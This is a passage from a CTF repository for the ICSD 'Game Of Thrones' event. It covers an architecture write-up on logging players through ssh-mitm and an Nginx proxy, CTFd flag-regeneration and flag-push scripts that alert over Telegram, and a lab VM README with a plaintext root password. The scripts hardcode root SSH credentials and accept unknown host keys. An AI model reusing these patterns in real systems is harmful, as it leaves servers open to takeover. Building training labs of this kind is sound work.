├── Game Of Thrones ├── Architecture │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── Architecture.svg │ │ ├── Log.gif │ │ ├── dracarys.gif │ │ ├── game.jpg │ │ ├── ssh-mitm.svg │ │ └── trust.gif ├── CTF Platform │ ├── README.md │ ├── blitz_overwrite.py │ ├── completion_checker.sh │ ├── db_flag_regeneration.py │ └── total_overwrite.sh ├── Machines │ ├── Blitz │ │ ├── README.md │ │ ├── Screenshots │ │ │ ├── admin-access-denied.png │ │ │ ├── admin-create-new-product.png │ │ │ ├── admin-panel-landing.png │ │ │ ├── burp-intercept-newproduct.png │ │ │ ├── discovering-sql-error.png │ │ │ ├── file-upload-1.png │ │ │ ├── file-upload-2.png │ │ │ ├── file-upload-3.png │ │ │ ├── git-gitserver-staging.png │ │ │ ├── git-ls-la.png │ │ │ ├── git-pipeline-staging.png │ │ │ ├── jenkins-app-dashboard.png │ │ │ ├── jenkins-build.png │ │ │ ├── jenkins-dashboard.png │ │ │ ├── jenkins-landing.png │ │ │ ├── jenkins-login-screen.png │ │ │ ├── jwt-1.png │ │ │ ├── jwt-2.png │ │ │ ├── jwt-3.png │ │ │ ├── main-landing.png │ │ │ ├── main-login.png │ │ │ ├── make-admin-added-new-admin.png │ │ │ ├── prod-web-root.png │ │ │ ├── registration-test.png │ │ │ ├── shell-as-postgres.png │ │ │ ├── source-code-1.png │ │ │ ├── sql-0-intercept.png │ │ │ ├── sql-1-create-table.png │ │ │ └── sql-2-rce.png │ │ └── Walkthrough.md │ ├── Bytescribe │ │ ├── README.md │ │ ├── Screenshots │ │ │ ├── Screenshot-2023-10-06-024100.png │ │ │ └── Screenshot-2023-10-06-035333.png │ │ └── Walkthrough.md │ ├── Callobes │ │ ├── README.md │ │ ├── Screenshots │ │ │ ├── image-1.png │ │ │ ├── image-2.png │ │ │ ├── image-3.png │ │ │ ├── image-4.png │ │ │ ├── image-5.png │ │ │ ├── image-6.png │ │ │ └── image.png │ │ └── Walkthrough.md │ ├── Captivity │ │ ├── README.md │ │ ├── Screenshots │ │ │ ├── 80_landing.png │ │ │ ├── bloodhound-analysis.png │ │ │ ├── bloodhound-login.png │ │ │ ├── bloodhound-shortest-path-2.png │ │ │ ├── bloodhound-shortest-path.png │ │ │ ├── file-hosting-dashboard-2.png │ │ │ ├── file-hosting-dashboard.png │ │ │ ├── file-hosting-landing.png │ │ │ ├── file-hosting-login.png │ │ │ ├── file-hosting-upload-exploit-2.png │ │ │ ├── file-hosting-upload-exploit.png │ │ │ ├── file-hosting-upload.png │ │ │ ├── google-exploit.png │ │ │ └── neo4j-initialize.png │ │ └── Walkthrough.md │ ├── Gitlab │ │ ├── README.md │ │ ├── Screenshots │ │ │ └── image-1.png │ │ └── Walkthrough.md │ ├── NoteApp │ │ ├── README.md │ │ ├── Screenshots │ │ │ └── image-1.png │ │ └── Walkthrough.md │ └── README.md └── README.md ├── README.md └── Who Am I ├── README.md ├── Writeups ├── C1 - Death Token Challenge │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── image.jpg │ │ ├── image1.png │ │ ├── image2.png │ │ ├── image3.png │ │ └── image4.png ├── C10 - Shadows Possession Jutsu │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── image 1.png │ │ ├── image 10.png │ │ ├── image 11.png │ │ ├── image 12.png │ │ ├── image 2.png │ │ ├── image 3.png │ │ ├── image 4.png │ │ ├── image 5.png │ │ ├── image 6.png │ │ ├── image 7.png │ │ ├── image 8.png │ │ ├── image 9.png │ │ └── image.png ├── C11 - Serial Escape │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── 2024-09-25_17h29_25.png │ │ ├── 2024-09-25_17h30_17.png │ │ ├── 2024-09-25_17h30_48.png │ │ ├── 2024-09-25_17h31_16.png │ │ ├── 2024-09-25_17h36_49.png │ │ ├── 2024-09-25_17h38_46.png │ │ ├── 2024-09-25_17h39_16.png │ │ ├── 2024-09-25_17h39_31.png │ │ ├── 2024-09-25_17h39_50.png │ │ ├── 2024-09-25_17h41_34.png │ │ ├── 2024-09-25_17h41_42.png │ │ ├── 2024-09-25_17h45_54.png │ │ ├── 2024-09-25_17h54_27.png │ │ ├── 2024-09-25_18h12_04.png │ │ ├── 2024-09-25_18h22_19.png │ │ ├── 2024-09-25_18h24_52.png │ │ ├── 2024-09-25_18h30_58.png │ │ ├── 2024-09-25_18h33_34.png │ │ ├── 2024-09-25_18h34_12.png │ │ ├── 2024-09-25_18h35_11.png │ │ ├── 2024-09-25_18h56_23.png │ │ └── 2024-09-27_22h13_01.png ├── C12 - Mr. Windoclin │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── cms-admin-dashboard.png │ │ ├── cms-admin-panel.png │ │ ├── cms-hostname-revealed.png │ │ ├── cms-rce.png │ │ ├── cms-redirects.png │ │ ├── cms-reverse-shell.png │ │ ├── docker-compose-file.png │ │ ├── ftp-session.png │ │ ├── github-osint-2.png │ │ ├── github-osint-3.png │ │ ├── github-osint.png │ │ ├── machine-exploited.png │ │ ├── prepare-exploit.png │ │ ├── shared-folder.png │ │ ├── wbce-cms-googled.png │ │ ├── wbce-cms.png │ │ ├── windows-enum.png │ │ └── windows-shared-folder.png ├── C2 - Decode the Escape │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── figure-1.png │ │ ├── figure-2.png │ │ ├── figure-3.png │ │ ├── figure-4.png │ │ ├── figure-5.png │ │ ├── figure-6.png │ │ ├── figure-7.png │ │ ├── figure-8.png │ │ └── figure-9.png ├── C3 - ANAIS_WATT3RS0N │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── image1.png │ │ ├── image2.png │ │ ├── image3.png │ │ ├── image4.png │ │ ├── image5.png │ │ └── image6.png ├── C4 - #exec cmd=whoami │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── figure-1.png │ │ ├── figure-2.png │ │ ├── figure-3.png │ │ ├── figure-4.png │ │ ├── figure-5.png │ │ ├── figure-6.png │ │ ├── figure-7.png │ │ ├── figure-8.png │ │ └── figure-9.png ├── C5 - Packet Detective │ ├── README.md │ ├── Writeup.md │ ├── challenge.pcapng │ └── images │ │ ├── figure-1.png │ │ ├── figure-2.png │ │ ├── figure-3.png │ │ ├── figure-4.png │ │ ├── figure-5.png │ │ ├── figure-6.png │ │ └── figure-7.png ├── C6 - Exorcising Sukuna’s Curse │ ├── README.md │ ├── Writeup.md │ └── images │ │ ├── ctf2.png │ │ ├── image 01.jpg │ │ ├── image 02.png │ │ ├── image 03.png │ │ ├── image 04.png │ │ ├── image 05.png │ │ ├── image 1.png │ │ ├── image 10.png │ │ ├── image 11.png │ │ ├── image 12.png │ │ ├── image 13.png │ │ ├── image 14.png │ │ ├── image 15.png │ │ ├── image 16.png │ │ ├── image 17.png │ │ ├── image 18.png │ │ ├── image 19.png │ │ ├── image 2.png │ │ ├── image 20.png │ │ ├── image 21.png │ │ ├── image 22.png │ │ ├── image 23.png │ │ ├── image 24.png │ │ ├── image 25.png │ │ ├── image 26.png │ │ ├── image 27.png │ │ ├── image 28.png │ │ ├── image 29.png │ │ ├── image 3.png │ │ ├── image 30.png │ │ ├── image 31.png │ │ ├── image 32.png │ │ ├── image 33.png │ │ ├── image 4.png │ │ ├── image 5.png │ │ ├── image 6.png │ │ ├── image 7.png │ │ ├── image 8.png │ │ ├── image 9.png │ │ ├── image.png │ │ └── imagee.png ├── C7 - Root Reaper Quest │ ├── README.md │ ├── audit.log │ ├── images │ │ ├── image1.png │ │ ├── image2.png │ │ ├── image3.png │ │ ├── image4.png │ │ ├── image5.png │ │ ├── image6.jpg │ │ └── image6.png │ └── writeup.md ├── C8 - In Quest for Rogue Dragon │ ├── Images │ │ ├── image 1.png │ │ ├── image 10.png │ │ ├── image 11.png │ │ ├── image 2.png │ │ ├── image 3.png │ │ ├── image 4.png │ │ ├── image 5.png │ │ ├── image 6.png │ │ ├── image 7.png │ │ ├── image 8.png │ │ ├── image 9.png │ │ ├── image.png │ │ └── imageee.png │ ├── README.md │ ├── Writeup.md │ └── rev.exe └── C9 - End of Rumbling │ ├── README.md │ ├── images │ ├── esasimage.png │ ├── image 1.png │ ├── image 10.png │ ├── image 11.png │ ├── image 12.png │ ├── image 13.png │ ├── image 14.png │ ├── image 15.png │ ├── image 16.png │ ├── image 17.png │ ├── image 18.png │ ├── image 19.png │ ├── image 2.png │ ├── image 20.png │ ├── image 21.png │ ├── image 3.png │ ├── image 4.png │ ├── image 5.png │ ├── image 6.png │ ├── image 7.png │ ├── image 8.png │ ├── image 9.png │ └── image.png │ └── writeup.md └── ctf_submission_logs.csv /Game Of Thrones/Architecture/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/README.md -------------------------------------------------------------------------------- /Game Of Thrones/Architecture/Writeup.md: -------------------------------------------------------------------------------- 1 | # Did the Winter really come to Westeros? Engineering the GoT CTF 2 | 3 | 4 | # Introduction 5 | 6 | This is supposed to be an abstraction to the technical preparation timeline of the CTF “Game Of Thrones”. The write-up will be a really objective (second-person) view (our honest confession) of our design, plans, choices, pros and cons, what we did well and didn’t throughout the process. 7 | 8 | “Game of Thrones” - **a power struggle: who has it, who wants it and how they plan to get it.** 9 | 10 | This is now your view as the Challenger of The Throne: 11 | 12 | **In the perilous realm of Westeros, flags hold power as coveted as the Iron Throne itself. Dive into the intricate web of challenges, where every capture brings you closer to ruling the Seven Kingdoms. Beware, for in this game of flags, you win or you lose. Only the cunning and brave will seize the throne and reign supreme.** 13 | 14 | This was the player’s challenge to overcome but what about the Throne, how is it choosing the Next Ruler? What are the sacrifices and risks the player needs to take while fighting their way through it? Let’s Build our Throne waiting for its Next Ruler to come! 15 | 16 | ![game.jpg](images/game.jpg) 17 | 18 | ### Deep Note 19 | 20 | This is not a really Deep-Dive Engineering blog which intents to surprise the reader while solving a complex riddle of great technological problem. 21 | 22 | It is just a Not-So-Technical blog of nerdy Non-Engineers Engineering their way to try to find answers to bunch of their dummy what-if questions. 23 | 24 | Did we really overcome the Winter? What about White walkers? Will see it together! 25 | 26 | # Challenges of Building a Throne 27 | 28 | Our final goal was to implement a CTF environment to fulfill the following ideas: 29 | 30 | - Not any kind of regulations by design - No rules will be conditioned to players, no ethics applied! 31 | - The CTF machines will be Same-Machine-All-Players - Any challenge machine will have just one instance at the given time period and all players will have to find their way out through that same machine. 32 | - As any player can have malicious intent (remember, no ethics applied!) inside machines, there will be no restriction. However, players can be caught by The City Watch(police) while or after committing a crime! So we needed to implement our version of “The City Watch”. 33 | 34 | In summary, we were supposed to implement a ‘healthy’ infrastructure to maintain a consistent, unbroken scheme throughout the CTF lifecycle. 35 | 36 | ## Design Challenges 37 | 38 | - Source of trust - static points that can’t be interfered by players (of any intent). 39 | - Logging - Implementing a consistent logging mechanism and what to do with the collected logs. 40 | - Automation - Being able to trigger vital actions (arguably complex for fully manual work) for keeping things in control. 41 | - Design of Infrastructure - Resource planning and optimization of structure elements. 42 | 43 | Time For Some Solutions! 44 | 45 | # Overcoming (Building The Throne) 46 | 47 | ## Discovering Source of Trust 48 | 49 | We first tried to make or find a solid Source of Trust Point(s) in the CTF Architecture so it would grant us to have complete control over the structure with the goal of keeping the system consistent and have more resistance. 50 | 51 | 52 | 53 | **Proxy ’em all!** 54 | 55 | Our initial thought was to implement some kind of a logical proxy. Theoretically, having first-hand control before and/or after players compromised the vulnerable machines. 56 | 57 | If we were able to implement this proxy logic, that would have been our actual Source of Trust! 58 | 59 | ## Logging The Unknown 60 | 61 | This was a bit challenging as we needed to log the actions of each player to be able to trace any issue that arose. Since all players would play in the same perimeter, we had to monitor malicious actions and revert the machines in a way that doesn’t disturb the ctf cycle. 62 | 63 | As these logs will play crucial role on the structure they should not be intervened in any ways. 64 | 65 | **Conclusion** 66 | 67 | After some (and some more) failed attempts, we came to a conclusion that we needed to find a way to log the OS level actions (commands), independent of access types (like ssh, ftp, or any other). If we would not be able to handle this universally, it would be disastrous as each protocol(thousands of ’em!) has its own characteristics to handle. 68 | 69 | So here, the “Source of Trust” proxy idea came to our mind! If our proxy was able to handle traffic universally (one entry point), we could use it in some way for standardized logging! 70 | 71 | For “One Entry Point” idea, we wanted to use SSH. Initially, it was a great idea! But How we can log SSH? 72 | 73 | **One** **ssh-mitm to rule ‘em all!** 74 | 75 | ***[SSH-MITM](https://github.com/ssh-mitm/ssh-mitm)** is a man in the middle SSH Server for security audits and malware analysis.* 76 | 77 | ![ssh-mitm.svg](images/ssh-mitm.svg) 78 | 79 | Basically we wanted to intercept all the traffic through the ssh server and hopefully being able to log them all, in which it lead us to another problem. If we settled on ssh-mitm to be utilized, where would it connect to(ssh forwarding)? 80 | 81 | Again after some attempts and failures, we came up with an idea to make use of some Intermediary system(s) to operate from. That’s when we decided to put the “Attack Box” logic into action - It is a well-known way of providing the players with a stable/predefined attack machine environment to engage with and launch attacks from to target system. 82 | 83 | We initially employed this logic as an SSH endpoint to connect through SSH-MITM, improving the reliability and consistency of our system for all users. 84 | 85 | **Web of web** 86 | 87 | Later We also decided to proxy the HTTP traffic separately from directly Nginx - The HTTP, by itself, covers most network traffic(so in our CTF). Additionally, requiring CTF players to connect via the command line interface (SSH) would pose a significant challenge when testing for web application vulnerabilities. That meant they would be unable to engage with well-known web application pentesting tools (like Burpsuite, ZAP, etc). 88 | 89 | Now our logging environment is defined and after some custom configurations to ssh-mitm tool and Nginx proxy itself we were able to *capture the unknown*! 90 | 91 | ![Log.gif](images/Log.gif) 92 | 93 | ## Some Automation? 94 | 95 | Much of the automation was revolved on the flag mechanism, which plays a vital role in the CTF platform. 96 | 97 | Under the hood, we used CTFd platform, an excellent open-source tool designed for Capture The Flag scenarios with user-friendly interface and high degree of customizability. 98 | 99 | With the goal of making the flag mechanism (generation, submission, and pushing) reliable, we implemented automation according to our Capture The Flag (CTF) strategy and requirements. We’ll not get into details but provide with a general overview of customization and the role of automation: 100 | 101 | - Flag Regeneration - to (re)generate flags under certain conditions (e.g. preventing the reuse of the same flag) 102 | - Flag Submission - to notify a particular team’s progress in machine solving (such as locating all flags), and subsequently enabling us to take protective measures (such as disabling that team’s access to the machine as a security measure). 103 | - Flag Placement - To upload (re)generated flags to CTF machines and provide notifications in case of failed push actions (identifying network errors and/or malicious actions of players), allowing us, for instance, to take certain measures like reverting damaged machines. 104 | 105 | **Note** - These are the most over-simplified versions and with filtered actions not listed, just a very general description of them. 106 | 107 | Now that we’ve discussed everything that brings us to the finalization, let’s take a look at the actual scheme! 108 | 109 | ## Design of Infrastructure 110 | 111 | ![Architecture.svg](images/Architecture.svg) 112 | 113 | This is a somewhat simplified version of the general architecture of the GoT CTF! 114 | 115 | Let’s summarize the design flow: 116 | 117 | - Players test web apps (HTTP) hosted in vulnerable machines - directly proxied through Nginx with virtual hosting (for solving port and/or service/daemon collision) to the ctf machines. 118 | - Players test other services hosted in vulnerable machines - Proxied through Nginx to an ssh-mitm instance and then forwarded to actual SSH server of the Attack box, then to underlying daemon. 119 | - Attack boxes are not allowed to have HTTP connectivity with CTF machines - for not violating our “HTTP Proxy” logic. 120 | - SSH-MITM and HTTP Proxy logs are forwarded to Elasticsearch instance for indexing and storage. 121 | - CTF players have direct access to CTF Platform (CTFd) and Elasticsearch instance (Blue Teaming). 122 | - Scripts inside the machine, in which CTFd is deployed, are pushing the flags (that are regenerated frequently) constantly (every 2 minutes) to vulnerable machines. And if the pushing is failed it is notifying us with Telegram(for detecting the possible intrusion). 123 | 124 | As this is our final design, before achieving it we did have some sub-paths we followed but eliminated through the time. Let’s see some of them. 125 | 126 | ### Failures of the Success 127 | 128 | Most Stand Out(Critical) Design Eliminations: 129 | 130 | - Logging the actions and traffic directly from CTF machines was the most straightforward and convenient choice initially. In fact, this was the motivation behind seeking a Static Source of Trust (for obvious reasons) that would remain untouched. 131 | - Ssh tunneling - We initially thought to make use of ssh as a tunnel. Our plan was to force player devices to connect through this ssh tunnel. However, we realized that, even if the ssh tunnel is employed, it would still be end-to-end communication. What that means is we would not be able to intercept it again as the connection would still be a protocol-based activity (no static point logic achieved actually). As a result, we ruled out this option. 132 | - To establish an SSH connection from ssh-mitm, we required an intermediary boundary, as discussed earlier. Initially, we considered forwarding that connection directly to Nginx for the simplicity. However, we realized that this approach posed a significant problem. If a player (potentially malicious) managed to execute commands, even with limited privileges, it would still compromise our “Source of Trust”. As a result, we decided to discard this option. 133 | - And the list can go on like that! 134 | 135 | # Conclusion 136 | 137 | So this is a refined version of tons of failed attempts, a showcase, right?! Maybe! 138 | 139 | While building the CTF with the given time and resource limitations, we did try to reveal something tangible that would catch the promise. The Architecture may have some weaker points depending on the viewer(so for us too), which is the raw idea, that we were able to make the concrete out of it at least to some point. Hence, is definitely open for further development and refinement! 140 | 141 | It is crucial to recognize that the act of creation frequently necessitates the deconstruction and subsequent reconstruction of an entity, allowing for its continual reemergence. 142 | 143 | Now Let the fun begin! Dracarys! 144 | 145 | 146 | 147 | **Perchance the winter has descended upon us, but the Night King, he hath not emerged in this season’s cold embrace!** 148 | -------------------------------------------------------------------------------- /Game Of Thrones/Architecture/images/Log.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/Log.gif -------------------------------------------------------------------------------- /Game Of Thrones/Architecture/images/dracarys.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/dracarys.gif -------------------------------------------------------------------------------- /Game Of Thrones/Architecture/images/game.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/game.jpg -------------------------------------------------------------------------------- /Game Of Thrones/Architecture/images/trust.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/trust.gif -------------------------------------------------------------------------------- /Game Of Thrones/CTF Platform/blitz_overwrite.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import paramiko 3 | import sys 4 | 5 | # Replace with your actual Bearer token and category_variable 6 | bearer_token = "ctfd_sampleToken" 7 | machine ="blitz" 8 | server_ip="10.20.52.2" 9 | 10 | ssh_username="root" 11 | 12 | ssh_password="PasswordOfRoot" 13 | 14 | # Define the URL for the initial request 15 | initial_url = f"http://localhost:8000/api/v1/challenges?category={machine}" 16 | 17 | # Set headers with the Bearer token 18 | headers = { 19 | "Authorization": f"Token {bearer_token}", 20 | "Content-Type":"application/json" 21 | 22 | } 23 | 24 | ssh_client=paramiko.SSHClient() 25 | ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 26 | 27 | def send_telegram_message(text): 28 | message_data = { 29 | 'chat_id' : 'TelegramGroupChatId', 30 | 'text' : 'Overwriter script - error in Blitz machine - ' + text 31 | } 32 | requests.post("https://api.telegram.org/botTokenProvidedByTelegram/sendMessage",data=message_data) 33 | 34 | 35 | try: 36 | ssh_client.connect(server_ip,username=ssh_username,password = ssh_password,timeout=10) 37 | except: 38 | send_telegram_message("no SSH access") 39 | sys.exit() 40 | 41 | try: 42 | # Make the initial request to get challenges 43 | response = requests.get(initial_url, headers=headers) 44 | # Check if the initial request was successful (status code 200) 45 | if response.status_code == 200: 46 | challenges = response.json()["data"] 47 | 48 | # Iterate over the list of challenges 49 | for challenge in challenges: 50 | challenge_id = challenge["id"] 51 | challenge_name = challenge["name"] 52 | # Define the URL for the second request using the challenge_id 53 | flags_url = f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}" 54 | 55 | # Make the second request for flags 56 | response = requests.get(flags_url, headers=headers) 57 | # Check if the second request was successful (status code 200) 58 | if response.status_code == 200: 59 | flag = response.json()["data"][0]["content"] 60 | if challenge_name == "user1.txt": 61 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /user1.txt ; echo {flag}> /user1.txt") 62 | error_message = stderr.read() 63 | if(error_message): 64 | send_telegram_message(error_message.decode('utf-8')) 65 | print("ERROR" + error_message.decode('utf-8')) 66 | print(f"SSHing {flag} into /user1.txt") 67 | elif challenge_name == "user2.txt": 68 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /home/git/user2.txt ; cd /home/git && touch user2.txt && echo {flag}> user2.txt && chown git:git user2.txt && chmod 600 user2.txt") 69 | error_message = stderr.read() 70 | if(error_message): 71 | send_telegram_message(error_message.decode('utf-8')) 72 | print("ERROR" + error_message.decode('utf-8')) 73 | print(f"SSHing {flag} into /home/git/user2.txt") 74 | elif challenge_name == "user3.txt": 75 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /home/node/user3.txt ; cd /home/node && touch user3.txt && echo {flag}> user3.txt && chown node:node user3.txt && chmod 600 user3.txt") 76 | error_message = stderr.read() 77 | if(error_message): 78 | send_telegram_message(error_message.decode('utf-8')) 79 | print("ERROR" + error_message.decode('utf-8')) 80 | 81 | print(f"SSHing {flag} into /home/node/user3.txt") 82 | elif challenge_name == "root.txt": 83 | stdin,stdout,stderr = ssh_client.exec_command(f"rm -rf /root/root.txt ; echo {flag}> /root/root.txt") 84 | error_message = stderr.read() 85 | if(error_message): 86 | send_telegram_message(error_message.decode('utf-8')) 87 | print("ERROR" + error_message.decode('utf-8')) 88 | 89 | print(f"SSHing {flag} into /root/root.txt") 90 | else: 91 | print("ERROR . CHALLENGE NOT FOUND IN OVERWRITE BLITZ") 92 | else: 93 | print(f"BLITZ Failed to retrieve flags for Challenge {challenge_id}. Status Code: {response.status_code}") 94 | else: 95 | print(f"BLITZ Failed to retrieve challenges. Status Code: {response.status_code}") 96 | except Exception as e: 97 | send_telegram_message(str(e)) 98 | print(f"BLITZ An error occurred: {str(e)}") 99 | 100 | ssh_client.close() 101 | -------------------------------------------------------------------------------- /Game Of Thrones/CTF Platform/completion_checker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | team_id=$1 4 | team_name=$2 5 | challenge_category=$3 6 | 7 | if [ $# -ne 3 ]; then 8 | exit 1 9 | fi 10 | 11 | challenge_ids=($(curl -sS -X GET http://localhost:8000/api/v1/challenges?category=$challenge_category --header "Authorization: Token ctfd_sampletoken" --header "Content-Type: application/json" | jq -r '.data[].id')) 12 | 13 | allChallengesOfMachineCompleted=true 14 | 15 | for id in "${challenge_ids[@]}"; do 16 | 17 | submission_result_count=$(curl -sS -X GET "http://localhost:8000/api/v1/submissions?team_id=${team_id}&challenge_id=${id}&type=correct" --header "Authorization: Token ctfd_sampletoken" --header "Content-Type: application/json" | jq -r '.meta.pagination.total') 18 | 19 | if [ "$submission_result_count" -ne 1 ]; then 20 | allChallengesOfMachineCompleted=false 21 | fi 22 | 23 | done 24 | 25 | if [ ${#challenge_ids[@]} -eq 0 ]; then 26 | 27 | allChallengesOfMachineCompleted=false 28 | 29 | fi 30 | 31 | if [ "$allChallengesOfMachineCompleted" = true ]; then 32 | 33 | curl -sS -X GET "https://api.telegram.org/botTokenProvidedByTelegram/sendMessage?chat_id=groupChatIdHere&text=Team_$(echo $team_id)_finished_machine_$(echo $challenge_category)" 34 | 35 | fi 36 | 37 | 38 | -------------------------------------------------------------------------------- /Game Of Thrones/CTF Platform/db_flag_regeneration.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import json 4 | import hashlib 5 | import datetime 6 | 7 | def main(argv): 8 | option = argv[0] 9 | if(option): 10 | request_url="" 11 | bearer_token="ctfd_sampletoken" 12 | if(option == "--all"): 13 | request_url="http://localhost:8000/api/v1/challenges" 14 | print("Generating flags in DB for all machines.") 15 | elif(option != ''): 16 | request_url=f"http://localhost:8000/api/v1/challenges?category={option}" 17 | print(f"Generating flags in DB for {option} machine") 18 | 19 | headers = { 20 | "Authorization": f"Token {bearer_token}", 21 | "Content-Type":"application/json" 22 | } 23 | 24 | challenges_response = requests.get(request_url, headers=headers) 25 | if challenges_response.status_code == 200: 26 | challenges = challenges_response.json()["data"] 27 | for challenge in challenges: 28 | challenge_id=challenge["id"] 29 | challenge_name=challenge["name"] 30 | machine = challenge["category"] 31 | flags_response=requests.get(f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}", headers=headers) 32 | if flags_response.status_code == 200: 33 | flag = flags_response.json()["data"][0] 34 | flag_id = flag["id"] 35 | 36 | ct = str(datetime.datetime.now()) 37 | pre_hash= ct + ";" + str(flag_id) + ";" + str(machine) + ";" + str (challenge_name) 38 | new_flag_hash=hashlib.md5(pre_hash.encode('utf-8')).hexdigest() 39 | new_flag=f"ICSD{{{new_flag_hash}}}" 40 | flag_change_data = { 41 | 'content':f'{new_flag}', 42 | 'data':'', 43 | 'type':'static', 44 | 'id': f'{flag_id}' 45 | } 46 | flag_regenerate_response = requests.patch(f"http://localhost:8000/api/v1/flags/{flag_id}", data=json.dumps(flag_change_data), headers=headers) 47 | if __name__ == "__main__": 48 | main(sys.argv[1:]) 49 | -------------------------------------------------------------------------------- /Game Of Thrones/CTF Platform/total_overwrite.sh: -------------------------------------------------------------------------------- 1 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/blitz_overwrite.py & 2 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/captivity_overwrite.py & 3 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_overwrite.py & 4 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_docker_overwrite.py & 5 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/noteapp_overwrite.py & 6 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/gitlab_overwrite.py & 7 | python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/callobes_overwrite.py & 8 | 9 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/README.md: -------------------------------------------------------------------------------- 1 | # Setup 2 | 3 | 1. Use the installation link to download the .ova file. 4 | 2. Import the image file to VMware using File -> Open 5 | > [!WARNING] 6 | > The images are not supported by virtualbox. 7 | 8 | 3. Choose a Virtual Machine name and location for the new VM. 9 | 4. The default Network Interface is configured as NAT. If not, please do so. 10 | 5. You can find IP address of the machine using arp-scan in your kali machine. 11 | ``` 12 | ┌──(kali㉿kali)-[~/Captivity] 13 | └─$ sudo arp-scan -l 14 | [sudo] password for kali: 15 | 16 | Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132 17 | Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 18 | 192.168.100.1 00:50:56:c0:00:08 VMware, Inc. 19 | 192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc. 20 | 192.168.100.131 00:0c:29:d5:b9:3e VMware, Inc. 21 | 192.168.100.254 00:50:56:fa:13:b9 VMware, Inc. 22 | 23 | 4 packets received by filter, 0 packets dropped by kernel 24 | Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 4 responded 25 | 26 | ┌──(kali㉿kali)-[~/Captivity] 27 | └─$ ssh root@192.168.100.131 28 | root@192.168.100.131's password: 29 | Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-33-generic x86_64) 30 | 31 | * Documentation: https://help.ubuntu.com 32 | * Management: https://landscape.canonical.com 33 | * Support: https://ubuntu.com/advantage 34 | 35 | 68 updates can be applied immediately. 36 | 22 of these updates are standard security updates. 37 | To see these additional updates run: apt list --upgradable 38 | 39 | Last login: Thu Sep 28 09:13:52 2023 from 192.168.100.1 40 | root@blitz:~# exit 41 | logout 42 | Connection to 192.168.100.131 closed. 43 | ``` 44 | 6. If something goes wrong, use the credentials provided below to access the machine. 45 | 46 | # Credentials 47 | ``` 48 | root:3AsaFRMwkdmBMQwuC4sr 49 | ``` 50 | -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-create-new-product.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/admin-panel-landing.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/burp-intercept-newproduct.png -------------------------------------------------------------------------------- /Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Machines/Blitz/Screenshots/discovering-sql-error.png -------------------------------------------------------------------------------- /Game Of 